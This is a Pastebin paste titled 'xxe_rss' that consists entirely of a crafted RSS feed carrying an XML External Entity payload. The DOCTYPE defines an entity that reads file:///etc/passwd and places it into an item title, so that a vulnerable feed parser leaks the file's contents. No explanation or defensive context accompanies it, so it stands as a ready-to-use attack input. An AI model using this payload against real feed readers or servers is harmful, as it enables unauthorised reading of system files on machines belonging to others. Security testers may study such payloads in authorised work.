Advertisement
nissim_abehcera

xxe_rss

Jan 27th, 2020
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1.  
  2. <?xml version="1.0" encoding="UTF-8"?>
  3. <!DOCTYPE title [ <!ELEMENT title ANY >
  4. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
  5. <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  6. <channel>
  7. <title>The Blog</title>
  8. <link>http://example.com/</link>
  9. <description>A blog about things</description>
  10. <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
  11. <item>
  12. <title>&xxe;</title>
  13. <link>http://example.com</link>
  14. <description>a post</description>
  15. <author>author@example.com</author>
  16. <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
  17. </item>
  18. </channel>
  19. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement